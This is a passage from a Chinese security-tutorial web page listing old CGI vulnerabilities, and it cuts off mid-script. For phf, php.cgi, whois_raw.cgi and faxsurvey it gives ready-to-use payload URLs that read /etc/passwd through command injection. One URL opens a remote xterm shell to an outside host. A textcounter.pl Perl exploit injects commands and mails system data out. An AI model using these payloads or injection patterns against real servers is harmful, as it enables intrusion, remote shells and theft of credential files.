当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-安全防入侵与防病毒基础(10)

安全基础
用net start 可以启动肉鸡的命令(2)
用net start 可以启动肉鸡的命令(3)
用net start 可以启动肉鸡的命令(4)
DDOS攻击 如何判断是否遭到流量攻击
网络防“虫”手段和全局安全网络的应用
个人网络安全防卫手册(1)
个人网络安全防卫手册(2)
个人网络安全防卫手册(3)
个人网络安全防卫手册(4)
个人网络安全防卫手册(5)
个人网络安全防卫手册(6)
一位高手整理的IIS FAQ
使用Exchange 2003防御地址欺骗(1)
使用Exchange 2003防御地址欺骗(2)
RAdmin 服务端高级配置(1)
只防病毒不安全 网络还需防什么(1)
只防病毒不安全 网络还需防什么(2)
主动防御电脑病毒并非天方夜谭
用XPSP2防火墙打造最强护身甲(1)
用XPSP2防火墙打造最强护身甲(2)

安全基础 中的 黑客攻防技术内幕-安全防入侵与防病毒基础(10)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 94 ::
收藏到网摘: n/a

3.5 CGI及系统漏洞速查(1)

    

3.5  CGI及系统漏洞速查

phf漏洞

漏洞介绍:phf漏洞是最经典了,可以通过浏览器执行服务器的命令来查找,如下     所示:

/etc/passwd

lynx  http://server/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd   

php.cgi 2.0beta10或更早版本的漏洞

漏洞介绍:可以读nobody权限的所有文件。

lynx  http://server/cgi-bin/php.cgi?/etc/passwd

注意:

php.cgi 2.1版本的只能读shtml文件,但对于密码文件可能在/etc/master.passwd/etc/security/passwd路径下。

whois_raw.cgi

lynx  http://server/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

lynx

http://server/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

faxsurvey

lynx  http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

textcounter.pl

漏洞介绍:如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行    命令。

#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this
$EMAIL='[email protected],root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothe
re_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\
n";